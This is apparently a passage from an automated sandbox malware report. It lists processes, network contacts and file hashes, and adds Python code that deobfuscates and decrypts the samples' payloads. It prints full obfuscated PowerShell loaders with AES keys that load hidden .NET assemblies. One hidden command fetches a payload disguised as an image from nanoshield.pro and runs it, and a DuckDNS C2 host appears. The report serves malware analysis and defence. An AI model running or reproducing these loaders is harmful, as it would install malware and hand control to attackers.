System.IO.MemoryStream(,$nVNGI);$NFsIp=New-Object System.IO.MemoryStream;$lBDbC=New-Object System.IO.Compression.GZipStream($EemcA,[IO.Compression.CompressionMode]::($LILq[12]));$lBDbC.($LILq[3])($NFsIp);$lBDbC.Dispose();$EemcA.Dispose();$NFsIp.Dispose();$NFsIp.ToArray();}$HrliX=[System.IO.File]::($LILq[5])([Console]::Title);$cGEtH=vSJcW (aPNpf ([Convert]::($LILq[10])([System.Linq.Enumerable]::($LILq[1])($HrliX, 5).Substring(2))));$IdyPm=vSJcW (aPNpf ([Convert]::($LILq[10])([System.Linq.Enumerable]::($LILq[1])($HrliX, 6).Substring(2))));[System.Reflection.Assembly]::($LILq[0])([byte[]]$IdyPm).($LILq[9]).($LILq[2])($null,$null);[System.Reflection.Assembly]::($LILq[0])([byte[]]$cGEtH).($LILq[9]).($LILq[2])($null,$null); "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\dbxcjp.bat" "
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -command "$Epbiwzhzg = Get-Content 'C:\Users\Admin\AppData\Local\Temp\dbxcjp.bat' | select-object -Last 1; $Pidhuf = [System.Convert]::FromBase64String($Epbiwzhzg);$Kfgkov = New-Object System.IO.MemoryStream( , $Pidhuf );$Rtzup = New-Object System.IO.MemoryStream;$Hvtlgiqv = New-Object System.IO.Compression.GzipStream $Kfgkov, ([IO.Compression.CompressionMode]::Decompress);$Hvtlgiqv.CopyTo( $Rtzup );$Hvtlgiqv.Close();$Kfgkov.Close();[byte[]] $Pidhuf = $Rtzup.ToArray();[Array]::Reverse($Pidhuf); $Ujrulpn = [System.Threading.Thread]::GetDomain().Load($Pidhuf); $Gkwzgehresm = $Ujrulpn.EntryPoint.DeclaringType.GetMethods()[0].Invoke($null, $null) | Out-Null"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\qiygww.cmd" "
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -command "$Lqctry = Get-Content 'C:\Users\Admin\AppData\Local\Temp\qiygww.cmd' | select-object -Last 1; $Gepinqdfw = [System.Convert]::FromBase64String($Lqctry);$Smjhpgfd = New-Object System.IO.MemoryStream( , $Gepinqdfw );$Ebvvkvbqat = New-Object System.IO.MemoryStream;$Ouefwyswci = New-Object System.IO.Compression.GzipStream $Smjhpgfd, ([IO.Compression.CompressionMode]::Decompress);$Ouefwyswci.CopyTo( $Ebvvkvbqat );$Ouefwyswci.Close();$Smjhpgfd.Close();[byte[]] $Gepinqdfw = $Ebvvkvbqat.ToArray();[Array]::Reverse($Gepinqdfw); $Tyossrcg = [System.Threading.Thread]::GetDomain().Load($Gepinqdfw); $Tzmchvhv = $Tyossrcg.EntryPoint.DeclaringType.GetMethods()[0].Invoke($null, $null) | Out-Null"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mfgpgc.bat" "
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ixgyed.bat" "
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -command "$Wogaptd = Get-Content 'C:\Users\Admin\AppData\Local\Temp\ixgyed.bat' | select-object -Last 1; $Bbvjyjl = [System.Convert]::FromBase64String($Wogaptd);$Osqqdzvqkq = New-Object System.IO.MemoryStream( , $Bbvjyjl );$Ooivncxsvx = New-Object System.IO.MemoryStream;$Ouqoommak = New-Object System.IO.Compression.GzipStream $Osqqdzvqkq, ([IO.Compression.CompressionMode]::Decompress);$Ouqoommak.CopyTo( $Ooivncxsvx );$Ouqoommak.Close();$Osqqdzvqkq.Close();[byte[]] $Bbvjyjl = $Ooivncxsvx.ToArray();[Array]::Reverse($Bbvjyjl); $Bjklpyasha = [System.Threading.Thread]::GetDomain().Load($Bbvjyjl); $Pldyxr = $Bjklpyasha.EntryPoint.DeclaringType.GetMethods()[0].Invoke($null, $null) | Out-Null"
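The two loader styles in this report's process lists can be unwound offline. The windows.cmd/update.cmd variant (behavioral24 and this analysis) hides every .NET member name as a junk-interleaved string stripped with .Replace and calls members by array index; it sets the console title to its own .cmd path so that File.ReadLines([Console]::Title) reads the batch file back in, takes ElementAt(lines, 5) and ElementAt(lines, 6) minus two leading characters, base64-decodes them, decrypts with the AES-CBC/PKCS7 key and IV hard-coded in the command line, gunzips, and hands each result to Assembly.Load(...).EntryPoint.Invoke. The dbxcjp.bat/qiygww.cmd/ixgyed.bat variant takes the last line of its file, base64-decodes, gunzips, reverses the byte order and loads the result into the current AppDomain. The Python below is an added example, not code from the report or from the loader's authors: it recovers the method-name array and AES parameters from the behavioral24 command line copied above, and reverses both staging schemes. It assumes the two stripped characters are a '::' batch-comment prefix (the report does not show the .cmd file), that the `cryptography` package is available for the AES step, and uses a constructed stand-in payload rather than any real stage.

```python
import base64
import gzip
import re

# Added example, not code from the sandbox report or from the loader's authors.
# Reverses the two PowerShell stage-loading schemes whose command lines appear in
# this report; only a constructed stand-in payload is embedded, no real stage.

# --- Variant 1 (windows.cmd / update.cmd): junk-interleaved member names --------
REPLACE_RE = re.compile(r"'([^']*)'\.Replace\('([^']*)',\s*''\)")

def deobfuscate_names(ps_fragment: str) -> list[str]:
    """Return the member-name array in the order the script builds it."""
    return [s.replace(junk, "") for s, junk in REPLACE_RE.findall(ps_fragment)]

def resolve_indexed_calls(ps_fragment: str, var: str, names: list[str]) -> str:
    """Rewrite every ($var[n]) call site to the recovered member name."""
    pattern = re.compile(r"\(\$" + re.escape(var) + r"\[(\d+)\]\)")
    return pattern.sub(lambda m: names[int(m.group(1))], ps_fragment)

def aes_parameters(ps_fragment: str) -> tuple[bytes, bytes]:
    """Decode the base64 AES key and IV from the .Key= / .IV= assignments
    (works before or after resolve_indexed_calls)."""
    call = r"\[System\.Convert\]::(?:\([^)]*\)|\w+)\('([^']+)'\)"
    key = re.search(r"\.Key=" + call, ps_fragment).group(1)
    iv = re.search(r"\.IV=" + call, ps_fragment).group(1)
    return base64.b64decode(key), base64.b64decode(iv)

def aes_stage_ciphertexts(cmd_text: str, indices=(5, 6), skip=2) -> list[bytes]:
    """ElementAt(lines, 5) and ElementAt(lines, 6) of the loader's own .cmd file,
    minus the first two characters (assumed to be a '::' comment prefix; the
    report does not show the file), base64-decoded."""
    lines = cmd_text.splitlines()
    return [base64.b64decode(lines[i][skip:]) for i in indices]

def decrypt_aes_stage(blob: bytes, key: bytes, iv: bytes) -> bytes:
    """AES-CBC/PKCS7 decrypt then gunzip, mirroring vJfVF() and JqmHs(); the result
    is the assembly passed to Assembly.Load. Assumes `cryptography` is installed."""
    from cryptography.hazmat.primitives import padding
    from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
    dec = Cipher(algorithms.AES(key), modes.CBC(iv)).decryptor()
    unpad = padding.PKCS7(128).unpadder()
    padded = dec.update(blob) + dec.finalize()
    return gzip.decompress(unpad.update(padded) + unpad.finalize())

# --- Variant 2 (dbxcjp.bat / qiygww.cmd / ixgyed.bat): last line of the file -----
def decode_reversed_gzip_stage(bat_text: str) -> bytes:
    """select -Last 1, FromBase64String, GzipStream Decompress, [Array]::Reverse."""
    last = bat_text.splitlines()[-1]
    return gzip.decompress(base64.b64decode(last))[::-1]

def looks_like_pe(blob: bytes) -> bool:
    """Cheap sanity check on a recovered stage: DOS 'MZ' header present."""
    return blob[:2] == b"MZ"

# Constructed stand-in for a dropped assembly and a variant-2 dropper (not real malware).
SAMPLE_ASSEMBLY = b"MZ\x90\x00" + bytes(range(256))

def build_sample_variant2_bat(payload: bytes) -> str:
    encoded = base64.b64encode(gzip.compress(payload[::-1])).decode()
    return "@echo off\r\nrem constructed stub\r\n" + encoded

# Copied from the behavioral24 command line in this report: the $GZdQ array plus
# the key, IV and file-read statements that index into it.
PAGE_FRAGMENT = (
    "$GZdQ='InnxIivnxIionxIikenxIi'.Replace('nxIi', ''),"
    "'MafFZUifFZUnMfFZUofFZUdulfFZUefFZU'.Replace('fFZU', ''),"
    "'RBxvFeaBxvFdLBxvFiBxvFneBxvFsBxvF'.Replace('BxvF', ''),"
    "'CryZmpeatyZmpeDyZmpeyZmpcryZmpypyZmptoyZmpryZmp'.Replace('yZmp', ''),"
    "'GeCwGCtCCwGCuCwGCrrCwGCenCwGCtCwGCPrCwGCoceCwGCssCwGC'.Replace('CwGC', ''),"
    "'ENPQHntNPQHryNPQHPoNPQHintNPQH'.Replace('NPQH', ''),"
    "'SZRwRpliZRwRtZRwR'.Replace('ZRwR', ''),"
    "'LoTzLuadTzLu'.Replace('TzLu', ''),"
    "'DeczTyPompzTyPreszTyPszTyP'.Replace('zTyP', ''),"
    "'CofgggpyfgggTofggg'.Replace('fggg', ''),"
    "'TrRwWianRwWisfoRwWirRwWimRwWiFiRwWinaRwWilBRwWiloRwWickRwWi'.Replace('RwWi', ''),"
    "'ChxtFnanxtFngextFnExxtFntenxtFnsxtFnioxtFnnxtFn'.Replace('xtFn', ''),"
    "'FrowqBNmwqBNBwqBNasewqBN64wqBNStrwqBNinwqBNgwqBN'.Replace('wqBN', ''),"
    "'ElMUHUeMUHUmMUHUentMUHUAtMUHU'.Replace('MUHU', '');"
    "$OYIYV.Key=[System.Convert]::($GZdQ[12])('HessG9Sp8I98uzvuAQwIGoeAOpm2R4JZwqif+tn9mzM=');"
    "$OYIYV.IV=[System.Convert]::($GZdQ[12])('Sq8oY624DUi5D/0NV4f3lQ==');"
    "$rlqXf=[System.IO.File]::($GZdQ[2])([Console]::Title);"
)

if __name__ == "__main__":
    names = deobfuscate_names(PAGE_FRAGMENT)
    print(names)
    print(resolve_indexed_calls(PAGE_FRAGMENT, "GZdQ", names))
    key, iv = aes_parameters(PAGE_FRAGMENT)
    print(f"AES-{len(key) * 8}-CBC, IV {len(iv)} bytes")
    stage = decode_reversed_gzip_stage(build_sample_variant2_bat(SAMPLE_ASSEMBLY))
    print(looks_like_pe(stage), stage == SAMPLE_ASSEMBLY)
```

Against a real windows.cmd the pipeline is `aes_stage_ciphertexts` followed by `decrypt_aes_stage` with the key and IV from `aes_parameters`; both recovered blobs should pass `looks_like_pe`, and the loader invokes the second one (ElementAt 6) first, then the first.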
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 76.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 216.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.99.105.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.114.53.23.in-addr.arpa | udp |
| NL | 23.62.61.113:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 113.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | jdokds.duckdns.org | udp |
| GB | 57.128.155.22:8895 | jdokds.duckdns.org | tcp |
| US | 8.8.8.8:53 | 22.155.128.57.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 65.139.73.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 145.136.73.23.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_soxeb2uu.sji.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/5084-9-0x000001F4623D0000-0x000001F4623F2000-memory.dmp
memory/5084-10-0x00007FFD088C0000-0x00007FFD09381000-memory.dmp
memory/5084-11-0x000001F447ED0000-0x000001F447EE0000-memory.dmp
memory/5084-12-0x000001F447ED0000-0x000001F447EE0000-memory.dmp
memory/5084-13-0x000001F4627A0000-0x000001F4627E4000-memory.dmp
memory/5084-14-0x000001F462870000-0x000001F4628E6000-memory.dmp
memory/3092-17-0x00007FFD088C0000-0x00007FFD09381000-memory.dmp
memory/3092-22-0x0000023EE9700000-0x0000023EE9710000-memory.dmp
memory/3092-21-0x0000023EE9700000-0x0000023EE9710000-memory.dmp
memory/3092-29-0x00007FFD088C0000-0x00007FFD09381000-memory.dmp
memory/5084-30-0x000001F462430000-0x000001F462444000-memory.dmp
memory/5084-31-0x00007FFD26E90000-0x00007FFD27085000-memory.dmp
memory/5084-32-0x00007FFD266B0000-0x00007FFD2676E000-memory.dmp
memory/5084-34-0x000001F4627F0000-0x000001F4627FE000-memory.dmp
memory/5084-33-0x000001F462440000-0x000001F46244C000-memory.dmp
memory/5084-35-0x000001F447ED0000-0x000001F447EE0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\dbxcjp.bat
| MD5 | 7834dbd67492fa350447dbd5debda5fc |
| SHA1 | e008dff36158beb0425d32036d9f65d5653184bd |
| SHA256 | d96f10a2672eb846ecb66d836dfe82933aca60094a367a90eee3aac0444a5573 |
| SHA512 | 02ac02dfd61f1ce96f79899523aedd6efd26a269bfecf4507ad3008fa384f9f2d9c9fac71664f7f0b1f6bdf6a397ee6757c199c0971f0b9803409f0c48d7206a |
memory/1464-42-0x0000000005000000-0x0000000005036000-memory.dmp
memory/1464-41-0x0000000074AE0000-0x0000000075290000-memory.dmp
memory/5084-45-0x000001F447ED0000-0x000001F447EE0000-memory.dmp
memory/1464-47-0x00000000057A0000-0x0000000005DC8000-memory.dmp
memory/1464-46-0x0000000005160000-0x0000000005170000-memory.dmp
memory/1464-44-0x0000000005160000-0x0000000005170000-memory.dmp
memory/5084-43-0x00007FFD088C0000-0x00007FFD09381000-memory.dmp
memory/1464-48-0x0000000005720000-0x0000000005742000-memory.dmp
memory/1464-50-0x0000000005FA0000-0x0000000006006000-memory.dmp
memory/1464-49-0x0000000005E40000-0x0000000005EA6000-memory.dmp
memory/1464-60-0x0000000006020000-0x0000000006374000-memory.dmp
memory/1464-61-0x00000000064D0000-0x00000000064EE000-memory.dmp
memory/1464-62-0x0000000006520000-0x000000000656C000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
| MD5 | a26df49623eff12a70a93f649776dab7 |
| SHA1 | efb53bd0df3ac34bd119adf8788127ad57e53803 |
| SHA256 | 4ebde1c12625cb55034d47e5169f709b0bd02a8caa76b5b9854efad7f4710245 |
| SHA512 | e5f9b8645fb2a50763fcbffe877ca03e9cadf099fe2d510b74bfa9ff18d0a6563d11160e00f495eeefebde63450d0ade8d6b6a824e68bd8a59e1971dc842709c |
C:\Users\Admin\AppData\Local\Temp\qiygww.cmd
| MD5 | f95dfe17a283dbb9301936821032b9a4 |
| SHA1 | 357edc773d07784e7fd295c2b273305994789fc4 |
| SHA256 | 22d6876c6b04fb74787a5e0803e62ed9c30cd05340ac0eb18ca358c916c3165c |
| SHA512 | 2a423ab3c92945600ef1ecc73e0e5ae46c69971b812985b46706b2447b7da1a259a3411e98ffea034aa6cc0880c154bd804785484bf9355357815d1c066d8de8 |
memory/5084-68-0x000001F447ED0000-0x000001F447EE0000-memory.dmp
memory/1880-69-0x0000000074AE0000-0x0000000075290000-memory.dmp
memory/1880-70-0x0000000004B80000-0x0000000004B90000-memory.dmp
memory/1880-71-0x0000000004B80000-0x0000000004B90000-memory.dmp
memory/1464-73-0x00000000069F0000-0x0000000006A0A000-memory.dmp
memory/1464-74-0x0000000006A40000-0x0000000006A62000-memory.dmp
memory/1464-72-0x00000000074B0000-0x0000000007546000-memory.dmp
memory/1464-81-0x0000000007B40000-0x00000000080E4000-memory.dmp
memory/1464-85-0x0000000008770000-0x0000000008DEA000-memory.dmp
memory/1464-86-0x0000000007830000-0x0000000007A62000-memory.dmp
memory/1464-87-0x00000000080F0000-0x0000000008312000-memory.dmp
memory/1880-89-0x0000000007260000-0x00000000074C2000-memory.dmp
memory/1880-91-0x0000000007DB0000-0x0000000007E42000-memory.dmp
memory/1880-90-0x00000000074D0000-0x000000000772C000-memory.dmp
memory/1880-92-0x00000000074D0000-0x0000000007727000-memory.dmp
memory/1880-93-0x00000000074D0000-0x0000000007727000-memory.dmp
memory/1880-95-0x00000000074D0000-0x0000000007727000-memory.dmp
memory/1880-97-0x00000000074D0000-0x0000000007727000-memory.dmp
memory/1880-100-0x00000000074D0000-0x0000000007727000-memory.dmp
memory/1880-103-0x00000000074D0000-0x0000000007727000-memory.dmp
memory/1880-105-0x00000000074D0000-0x0000000007727000-memory.dmp
memory/1880-107-0x00000000074D0000-0x0000000007727000-memory.dmp
memory/1880-109-0x00000000074D0000-0x0000000007727000-memory.dmp
memory/1880-111-0x00000000074D0000-0x0000000007727000-memory.dmp
memory/1880-113-0x00000000074D0000-0x0000000007727000-memory.dmp
memory/1880-115-0x00000000074D0000-0x0000000007727000-memory.dmp
memory/1880-117-0x00000000074D0000-0x0000000007727000-memory.dmp
memory/1880-119-0x00000000074D0000-0x0000000007727000-memory.dmp
memory/1880-121-0x00000000074D0000-0x0000000007727000-memory.dmp
memory/1880-123-0x00000000074D0000-0x0000000007727000-memory.dmp
memory/1880-125-0x00000000074D0000-0x0000000007727000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\mfgpgc.bat
| MD5 | b73dc1ad88598d67c62f694c382be267 |
| SHA1 | 7a5574b1e22e860e71c47104a588cfbcc78f9a63 |
| SHA256 | 6ee076cc6d3be85fbb81e4d42276af43fcf3be7445de87d6e0497c9993ca2687 |
| SHA512 | d3afb4291432110a063be5506c4d96a82247fa666338e9ce02f19cb3d112118d65a1c1e83947cbe914f10c484f196172cf032e015b4ab00b3a08cca0c1aab675 |
memory/1880-128-0x00000000074D0000-0x0000000007727000-memory.dmp
memory/1880-131-0x00000000074D0000-0x0000000007727000-memory.dmp
memory/1880-133-0x00000000074D0000-0x0000000007727000-memory.dmp
memory/1880-135-0x00000000074D0000-0x0000000007727000-memory.dmp
memory/1880-137-0x00000000074D0000-0x0000000007727000-memory.dmp
memory/1880-139-0x00000000074D0000-0x0000000007727000-memory.dmp
memory/1880-141-0x00000000074D0000-0x0000000007727000-memory.dmp
memory/1880-145-0x00000000074D0000-0x0000000007727000-memory.dmp
memory/1880-147-0x00000000074D0000-0x0000000007727000-memory.dmp
memory/1880-149-0x00000000074D0000-0x0000000007727000-memory.dmp
memory/1880-151-0x00000000074D0000-0x0000000007727000-memory.dmp
memory/1880-153-0x00000000074D0000-0x0000000007727000-memory.dmp
memory/1880-155-0x00000000074D0000-0x0000000007727000-memory.dmp
memory/1880-157-0x00000000074D0000-0x0000000007727000-memory.dmp
memory/1880-159-0x00000000074D0000-0x0000000007727000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\ixgyed.bat
| MD5 | a27d0d05a470dc95f1c74c7861761e9f |
| SHA1 | c4533a4822975c7a6316e375e365df82676dce76 |
| SHA256 | 3efe939bbca5c286978f8695ddeda122222cac8aef1c53ab8a63007e5a3287b7 |
| SHA512 | 7b3fb05433f58375e1d127f767ccd2cbc90cdce3651127db03d87867cf840002405aeaccebf16c2d1f6242e56b9fc8932210c7f194ecb8204ff1c3616b45409f |
memory/5084-351-0x000001F447ED0000-0x000001F447EE0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
| MD5 | def29ac8e5cffef459c3d64d6bb18fb2 |
| SHA1 | ab64966735208644930daf81af0fde24993d7d20 |
| SHA256 | 1fc6235ced7ccb482365969ccf76b6e54ed12fb3bb09a7bd37e2fa161a09fe57 |
| SHA512 | c62966b63c9d7706beb01c9e29b014c2a10307a06defbb3d0137d7af97f211e87140098617a30f1dc0637f9b0e7d008d5f9b88a8cf2c78d3f97450aa77efef45 |
memory/1464-727-0x0000000074AE0000-0x0000000075290000-memory.dmp
memory/1548-729-0x0000000074AE0000-0x0000000075290000-memory.dmp
memory/1548-731-0x00000000048E0000-0x00000000048F0000-memory.dmp
memory/1548-732-0x00000000048E0000-0x00000000048F0000-memory.dmp
memory/1548-798-0x0000000006DC0000-0x0000000006FF0000-memory.dmp
memory/1548-805-0x00000000076D0000-0x00000000078EE000-memory.dmp
memory/1880-867-0x0000000074AE0000-0x0000000075290000-memory.dmp
memory/1880-868-0x0000000004B80000-0x0000000004B90000-memory.dmp
Analysis: behavioral17
Detonation Overview
Submitted
2024-04-19 07:49
Reported
2024-04-19 07:52
Platform
win7-20240215-en
Max time kernel
121s
Max time network
123s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2944 wrote to memory of 2152 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2944 wrote to memory of 2152 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2944 wrote to memory of 2152 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2152 wrote to memory of 2756 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2152 wrote to memory of 2756 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2152 wrote to memory of 2756 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\windows_update\update.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://nanoshield.pro/new_image2.jpg?166154725', 'https://nanoshd.pro/files/new_image.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.indabid/selif/orp.dleihsonan//:sptth', '1', 'Adobe'))}}"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | nanoshd.pro | udp |
| US | 8.8.8.8:53 | nanoshield.pro | udp |
| US | 104.21.37.30:443 | nanoshield.pro | tcp |
Files
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\N49VBC6DQ5BB7A5T25YX.temp
| MD5 | 67bbe7e09328fc2471b8d522d32e9df8 |
| SHA1 | a572e8c7f62262893b7fdaddb456853fa8747df4 |
| SHA256 | d15c9016f579b6c3f48705edd42ae087efdfc1c07a3ee7f7540c8266aaf319f2 |
| SHA512 | 8bc81074d9d25db83f692381baeb4056e5b46f6a277ab9a05059daeb6fb9300fe2b81f2b690550f3bb9a2c84ee4111356342569e0ffb9c997c09bf9ea4cd10db |
Analysis: behavioral15
Detonation Overview
Submitted
2024-04-19 07:49
Reported
2024-04-19 07:52
Platform
win7-20231129-en
Max time kernel
119s
Max time network
121s
Command Line
Signatures
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\windows_update\update.cmd"
C:\Windows\system32\cmd.exe
cmd /c \"set __=^&rem\
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\windows_update\update.cmd
C:\Windows\system32\cmd.exe
cmd /c \"set __=^&rem\
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\windows_update\update.cmd';$LILq='LGNGQoGNGQadGNGQ'.Replace('GNGQ', ''),'ElevbZPmvbZPenvbZPtvbZPAvbZPtvbZP'.Replace('vbZP', ''),'InUMsVvoUMsVkUMsVeUMsV'.Replace('UMsV', ''),'CopFijyyTFijyoFijy'.Replace('Fijy', ''),'CZakhhaZakhnZakhgeEZakhxtZakhenZakhsZakhioZakhnZakh'.Replace('Zakh', ''),'ReyUhbayUhbdyUhbLiyUhbnesyUhb'.Replace('yUhb', ''),'SOZpUplOZpUitOZpU'.Replace('OZpU', ''),'TrMlaCanMlaCsMlaCfMlaCoMlaCrMlaCmFiMlaCnalMlaCBlMlaCockMlaC'.Replace('MlaC', ''),'MaXOkGiXOkGnXOkGModXOkGulXOkGeXOkG'.Replace('XOkG', ''),'EnkMdetrykMdePokMdeinkMdetkMde'.Replace('kMde', ''),'FrwpnfomwpnfBawpnfse6wpnf4Stwpnfrwpnfingwpnf'.Replace('wpnf', ''),'GemcvPtCmcvPurmcvPrmcvPenmcvPtPrmcvPocmcvPessmcvP'.Replace('mcvP', ''),'DecxpgKoxpgKmxpgKpxpgKresxpgKsxpgK'.Replace('xpgK', ''),'CrtTyceattTycetTycDetTyccrtTycypttTycortTyc'.Replace('tTyc', '');powershell -w hidden;function aPNpf($nVNGI){$htbMs=[System.Security.Cryptography.Aes]::Create();$htbMs.Mode=[System.Security.Cryptography.CipherMode]::CBC;$htbMs.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$htbMs.Key=[System.Convert]::($LILq[10])('/MlRmzNe+ZzBdBywbWhCQRBk9F+NMckIyZTwiuahK6M=');$htbMs.IV=[System.Convert]::($LILq[10])('XI44fhXZ241HbBx9GSgTSw==');$jJhvE=$htbMs.($LILq[13])();$EHnru=$jJhvE.($LILq[7])($nVNGI,0,$nVNGI.Length);$jJhvE.Dispose();$htbMs.Dispose();$EHnru;}function vSJcW($nVNGI){$EemcA=New-Object System.IO.MemoryStream(,$nVNGI);$NFsIp=New-Object System.IO.MemoryStream;$lBDbC=New-Object System.IO.Compression.GZipStream($EemcA,[IO.Compression.CompressionMode]::($LILq[12]));$lBDbC.($LILq[3])($NFsIp);$lBDbC.Dispose();$EemcA.Dispose();$NFsIp.Dispose();$NFsIp.ToArray();}$HrliX=[System.IO.File]::($LILq[5])([Console]::Title);$cGEtH=vSJcW (aPNpf ([Convert]::($LILq[10])([System.Linq.Enumerable]::($LILq[1])($HrliX, 5).Substring(2))));$IdyPm=vSJcW (aPNpf ([Convert]::($LILq[10])([System.Linq.Enumerable]::($LILq[1])($HrliX, 
6).Substring(2))));[System.Reflection.Assembly]::($LILq[0])([byte[]]$IdyPm).($LILq[9]).($LILq[2])($null,$null);[System.Reflection.Assembly]::($LILq[0])([byte[]]$cGEtH).($LILq[9]).($LILq[2])($null,$null); "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Network
Files
Analysis: behavioral25
Detonation Overview
Submitted
2024-04-19 07:49
Reported
2024-04-19 07:52
Platform
win7-20240221-en
Max time kernel
119s
Max time network
124s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
